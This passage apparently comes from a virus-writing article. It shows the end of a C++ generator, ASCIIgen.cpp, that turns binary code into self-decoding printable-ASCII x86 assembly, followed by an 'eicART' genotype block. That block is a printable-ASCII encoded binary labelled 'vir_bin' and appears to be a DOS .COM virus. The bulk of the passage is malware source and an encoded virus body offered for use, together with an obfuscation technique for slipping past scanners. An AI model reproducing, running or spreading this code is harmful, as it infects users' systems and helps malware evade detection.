OutFile << "sub byte [bx], ch ; 0x" << (int)msk.n << "-0x" << (int)msk.q << "=" << (int)c << endl; OutFile << "inc bx" << endl << endl; EncD << "db " << (int)msk.n << "d" << endl; } if (msk.typ==2) { // c=n-q-q int rnd=rand() % 94 + 33; OutFile << "pop ax ; AX=0000; Stack: [EMPTY]" << endl; OutFile << "push ax ; Stack: 0x0000" << endl; OutFile << "xor ax, 0x" << (int)msk.q << rnd << " ; AX=0x" << (int)msk.q << rnd << endl; OutFile << "push ax ; Stack: 0x0000 0x" << (int)msk.q << rnd << endl; OutFile << "pop cx ; CX=0x" << (int)msk.q << rnd << "; Stack: 0x0000" << endl; OutFile << "sub byte [bx], ch" << endl; OutFile << "sub byte [bx], ch ; [BX]=" << (int)c << endl; OutFile << "inc bx" << endl << endl; EncD << "db " << (int)msk.n << "d" << endl; } c=InFile.get(); } cout << OutSize << endl; OutFile << endl << "; " << dec << OutSize << " Byte" << endl; OutFile << endl << "eicART:" << endl; OutFile << endl << "include 'EncData.inc'" << endl; OutFile.close(); EncD.close(); InFile.close(); system("PAUSE"); return EXIT_SUCCESS; } ################################[ASCIIgen.cpp]################################# !eicART_vir_bin: #############################[eicART genotype]############################### XP5!E-k@P[CCXP5J!PY(/CXP5LJPY(/(/CXP5E!PY(/CCXP5w!PY(/CCXP5x+PY(/CXP5;uPY(/CXP5+OPY(/(/CXP5?aPY(/CCXP5o&PY(/CXP59uPY(/CXP5bOPY(/(/CXP5HaPY(/CCXP5`+PY(/CXP5"tPY(/CXP5|OPY(/(/CXP56)PY(/CXP5r!PY(/CCCXP5%mPY(/CCCXP5BaPY(/CXP5oLPY(/(/CXP5X/PY(/CXP5CTPY(/CCXP5QGPY(/(/CXP5\!PY(/CXP5+mPY(/CCXP5ehPY(/CCXP5@!PY(/CXP5+gPY(/CXP5i"PY(/CXP5^!PY(/CXP5zTPY(/CCXP5-mPY(/CCXP5.TPY(/CCCCXP5gmPY(/CXP5t!PY(/CXP5ogPY(/CCXP5&!PY(/CXP5jTPY(/CCXP56mPY(/CCCXP59aPY(/CXP5BhPY(/CXP5>!PY(/CXP55!PY(/CXP5bgPY(/CXP5"!PY(/CXP5[!PY(/CXP5(TPY(/CCCXP5$!PY(/CXP5ViPY(/CXP5'!PY(/CCXP5jgPY(/CXP5)BPY(/(/CXP5M!PY(/CXP5NTPY(/CCXP50LPY(/(/CXP5l^PY(/CXP5lmPY(/CCXP5\hPY(/CCXP5r!PY(/CXP5;gPY(/CXP5#"PY(/CXP5!!fa!*!"&!!!N0!!(!!=&!!r=!#=!"!!!!!!@!I%!!)!!!>!!!O!!!A*.com!.+AAL'artApourAl'art!.+.+...AeicART!.+$ #############################[eicART genotype]###############################